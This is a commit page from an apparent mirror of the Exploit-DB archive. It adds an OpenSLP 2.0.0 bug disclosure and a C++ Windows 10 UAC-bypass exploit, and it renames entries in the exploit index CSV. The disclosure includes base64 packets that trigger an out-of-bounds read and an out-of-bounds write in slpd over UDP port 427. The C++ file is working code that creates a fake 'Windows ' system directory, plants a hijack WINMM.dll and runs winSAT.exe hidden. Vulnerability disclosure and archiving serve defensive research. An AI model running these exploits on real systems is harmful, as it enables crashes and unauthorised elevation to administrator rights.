bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-10

Browse source 
2 changes to exploits/shellcodes

Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)
Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC)
Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation
Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation

openslp 2.0.0 - Double-Free
OpenSLP 2.0.0 - Double-Free

Windows Speech Recognition - Buffer Overflow (PoC)
Microsoft Windows Speech Recognition - Buffer Overflow (PoC)

Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)
Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011)

Windows Firewall Control - Unquoted Service Path Privilege Escalation
Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation

Windows DVD Maker 6.1.7 - XML External Entity Injection
Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection

Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)
Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)

Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation
Microsoft Windows 10  (Build 1703  Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation

Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation

Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation

Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)
Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)
OpenSLP 2.0.0 - Multiple Vulnerabilities
Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)
This commit is contained in:
Offensive Security 2018-11-10 05:01:40 +00:00
parent 2ab2c94376
commit 925e6e0629
3 changed files with 316 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

264
exploits/linux/local/45804.txt Normal file
View file

@ -0,0 +1,264 @@
_ _
/ | ___ ___ ___ ___ ___| |___
_ / / | . | . | -_| |_ -| | . |
|_|_/ |___| _|___|_|_|___|_| _|
|_| |_|
2018-11-07
MORE BUGS IN OPENSLP-2.0.0
==========================
I discovered some bugs in openslp-2.0.0 back in January, 2018.
One of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),
and today I'm disclosing two more.
BUG 1
=====
This issue is an OOB read that does not crash the application.
So in terms of exploitation it is not very interesting. If that's what
you're here for then scroll down to bug#2.
After the occurence of the bug the application actually detects the error
and ignores the malicious packet. Therefore, it could be argued that this
is not a bug at all. Nevertheless, here it is:
Proof of concept exploit:
echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d > /dev/udp/127.0.0.1/427
Valgrind report:
==27968== Invalid read of size 1
==27968== at 0x412436: GetUINT16 (slp_message.c:63)
==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)
==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)
==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)
==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)
==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)
==27968== by 0x40256B: main (slpd_main.c:699)
==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd
==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)
==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)
==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)
==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)
==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)
==27968== by 0x40256B: main (slpd_main.c:699)
Analysis:
v2ParseSrvReg is responsible for parsing incoming requests. Various bytes
are read from the packet and interpreted as integers used as length fields.
One of them is the scopelistlen, parsed on line 321, and further used as
argument for the amount of bytes to increment the buffer->curpos pointer
in the the GetStrPtr function, shown below on line 112. It now points to
uninitialized memory.
The OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos
pointer is dereferenced.
Subsequently the comparison on line 329 evaluates to true since the
buffer->curpos now points to memory located after the buffer->end
pointer. The application therefore stops processing the malicious packet.
291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)
292 {
293 int result;
294
295 /* 0 1 2 3
296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
298 | <URL-Entry> \
299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
300 | length of service type string | <service-type> \
301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
302 | length of <scope-list> | <scope-list> \
303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
304 | length of attr-list string | <attr-list> \
305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\
307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */
308
309 /* Parse the <URL-Entry>. */
310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);
311 if (result != 0)
312 return result;
313
314 /* Parse the <service-type> string. */
315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);
316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);
317 if (buffer->curpos > buffer->end)
318 return SLP_ERROR_PARSE_ERROR;
319
320 /* Parse the <scope-list> string. */
321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);
322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);
323 if (buffer->curpos > buffer->end)
324 return SLP_ERROR_PARSE_ERROR;
325
326 /* Parse the <attr-list> string. */
327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);
328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);
329 if (buffer->curpos > buffer->end)
330 return SLP_ERROR_PARSE_ERROR;
54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.
55 *
56 * @param[in,out] cpp - The address of a pointer from which to extract.
57 *
58 * @return A 16-bit unsigned value in native format; the buffer pointer
59 * is moved ahead by 2 bytes on return.
60 */
61 uint16_t GetUINT16(uint8_t ** cpp)
62 {
63 uint16_t rv = AS_UINT16(*cpp);
64 *cpp += 2;
65 return rv;
66 }
...
96 /** Extract a string buffer address into a character pointer.
97 *
98 * Note that this routine doesn't actually copy the string. It only casts
99 * the buffer pointer to a character pointer and moves the value at @p cpp
100 * ahead by @p len bytes.
101 *
102 * @param[in,out] cpp - The address of a pointer from which to extract.
103 * @param[in] len - The length of the string to extract.
104 *
105 * @return A pointer to the first character at the address pointed to by
106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes
107 * on return.
108 */
109 char * GetStrPtr(uint8_t ** cpp, size_t len)
110 {
111 char * sp = (char *)*cpp;
112 *cpp += len;
113 return sp;
114 }
Proof of discovery:
$ echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d | sha256sum
0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -
twitter.com/magnusstubman/status/953909628622069760
Patch:
I'm not aware of any patch, and I'm not sure the maintainers are going to patch it.
BUG 2
=====
First and foremost, I'm not claiming credit for this bug since it was
apparently discovered by Reno Robert and publicly disclosed on the
oss-security mailing list on 2016-09-27 and awarded CVE-2016-7567
the day after.
openwall.com/lists/oss-security/2016/09/27/4
openwall.com/lists/oss-security/2016/09/28/1
Anyhow, I wasn't aware of the issue and found it by fuzzing, so I
reported it to the maintainers who made me aware of the earlier discovery.
What puzzled me was that no announcement had been made and the fact that
the latest stable version on their website is still vulnerable! I found it
2017-12-06 and reported it 2018-01-18. See further down for proof of
discovery.
I havn't been able to find any exploit for this bug anywhere. Therefore,
I'm today disclosing a proof-of-concept exploit for the bug to increase
attention on the issue.
Exploit:
echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d > /dev/udp/127.0.0.1/427
Valgrind report:
==56913== Invalid write of size 1
==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914)
==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)
==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)
==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)
==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)
==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)
==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)
==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)
==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)
==56913== by 0x402383: main (slpd_main.c:699)
==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd
==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)
==56913== by 0x410096: SLPCompareString (slp_compare.c:365)
==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)
==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)
==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)
==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)
==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)
==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)
==56913== by 0x402383: main (slpd_main.c:699)
The while loop on line 207 fails to perform bounds checking, and as such
may end up incrementing the pointer p up to a point such that p is bigger
than ep. Thus, the third argument to memmove on line 2010 becomes negative.
However, since memmove accepts a size_t (which is unsigned) the value wraps
around and becomes UINT_MAX or close to UINT_MAX resulting in memmove
attempting to move an excessive amount of memory, resulting in OOB write.
184 /** fold internal white space within a string.
185 *
186 * folds all internal white space to a single space character within a
187 * specified string. modified the @p str parameter with the result and
188 * returns the new length of the string.
189 *
190 * @param[in] len - the length in bytes of @p str.
191 * @param[in,out] str - the string from which extraneous white space
192 * should be removed.
193 *
194 * @return the new (shorter) length of @p str.
195 *
196 * @note this routine assumes that leading and trailing white space have
197 * already been removed from @p str.
198 */
199 static int slpfoldwhitespace(size_t len, char * str)
200 {
201 char * p = str, * ep = str + len;
202 while (p < ep)
203 {
204 if (isspace(*p))
205 {
206 char * ws2p = ++p; /* point ws2p to the second ws char. */
207 while (isspace(*p)) /* scan till we hit a non-ws char. */
208 p++;
209 len -= p - ws2p; /* reduce the length by extra ws. */
210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */
211 }
212 p++;
213 }
214 return (int)len;
215 }
Proof of discovery:
$ echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d | sha256sum
5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -
twitter.com/magnusstubman/status/938317849474555904
Patch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a
REFERENCES
==========
- sourceforge.net/p/openslp/bugs/161
- sourceforge.net/p/openslp/bugs/160
- twitter.com/magnusstubman/status/938317849474555904
- twitter.com/magnusstubman/status/953909628622069760
- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a
- openwall.com/lists/oss-security/2016/09/27/4
- openwall.com/lists/oss-security/2016/09/28/1

37
exploits/windows/local/45805.cpp Normal file
View file

@ -0,0 +1,37 @@
#include "stdafx.h"
#include <Windows.h>
#include "resource.h"
void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) {
HMODULE hMod = GetModuleHandle(NULL);
HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName);
DWORD dllSize = SizeofResource(hMod, res);
void* dllBuff = LoadResource(hMod, res);
HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
DWORD sizeOut;
WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
CloseHandle(hDll);
}
int main()
{
_SHELLEXECUTEINFOW se = {};
//Create Mock SystemRoot Directory
CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false);
//Drop our dll for hijack
DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
//Execute our winSAT.exe copy from fake trusted directory
se.cbSize = sizeof(_SHELLEXECUTEINFOW);
se.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
se.lpParameters = L"formal";
se.nShow = SW_HIDE;
se.hwnd = NULL;
se.lpDirectory = NULL;
ShellExecuteEx(&se);
return 0;
}

28
files_exploits.csv
View file

@ -5337,7 +5337,7 @@ id,file,description,date,author,type,platform,port
40878,exploits/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,dos,windows,
40879,exploits/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,dos,windows,
40880,exploits/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,dos,windows,
40883,exploits/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows,
40883,exploits/windows/dos/40883.py,"Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows,
40885,exploits/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,dos,windows,
40886,exploits/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",dos,hardware,
40888,exploits/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",dos,linux,
@ -6004,8 +6004,8 @@ id,file,description,date,author,type,platform,port
44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
44908,exploits/linux/dos/44908.txt,"Redis 5.0 - Denial of Service",2018-06-20,"Fakhri Zulkifli",dos,linux,
44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux,
44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
44914,exploits/windows/dos/44914.txt,"Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
44915,exploits/windows/dos/44915.txt,"Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,
@ -6013,7 +6013,7 @@ id,file,description,date,author,type,platform,port
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
@ -6026,7 +6026,7 @@ id,file,description,date,author,type,platform,port
45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,
45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux,
45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows,
45077,exploits/windows/dos/45077.txt,"Microsoft Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows,
45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows,
45091,exploits/windows/dos/45091.py,"Core FTP 2.0 - 'XRMD' Denial of Service (PoC)",2018-07-26,"Erik David Martin",dos,windows,
45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
@ -6258,7 +6258,7 @@ id,file,description,date,author,type,platform,port
261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,local,sco,
265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix,
270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,local,irix,
271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows,
271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows,
272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow",2004-04-15,snooq,local,windows,
273,exploits/linux/local/273.c,"SquirrelMail - 'chpasswd' Local Buffer Overflow",2004-04-20,x314,local,linux,
281,exploits/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Local Privilege Escalation",2001-03-02,"Cody Tubbs",local,tru64,
@ -9489,7 +9489,7 @@ id,file,description,date,author,type,platform,port
40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows,
40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows,
40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,
40443,exploits/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows,
40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows,
40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux,
40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,
40460,exploits/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,local,windows,
@ -9630,7 +9630,7 @@ id,file,description,date,author,type,platform,port
41597,exploits/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",local,linux,
41605,exploits/windows_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,local,windows_x86-64,
41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
@ -9734,7 +9734,7 @@ id,file,description,date,author,type,platform,port
42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,
42121,exploits/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,local,windows,
42141,exploits/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",local,windows,
42142,exploits/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows,
42142,exploits/windows/local/42142.rb,"Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows,
42145,exploits/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",local,multiple,
42146,exploits/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,local,macos,
42157,exploits/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,local,windows,
@ -9824,7 +9824,7 @@ id,file,description,date,author,type,platform,port
43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows,
43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows,
43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows,
43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86,
43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86,
43201,exploits/macos/local/43201.rb,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos,
43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
@ -9907,7 +9907,7 @@ id,file,description,date,author,type,platform,port
44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows,
44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows,
44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
44478,exploits/windows_x86/local/44478.cpp,"Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86,
@ -10016,7 +10016,7 @@ id,file,description,date,author,type,platform,port
45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux,
45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86,
45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux,
45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows,
45244,exploits/windows/local/45244.txt,"Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation",2018-08-22,"Atredis Partners",local,windows,
45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86,
45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows,
@ -10072,7 +10072,7 @@ id,file,description,date,author,type,platform,port
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
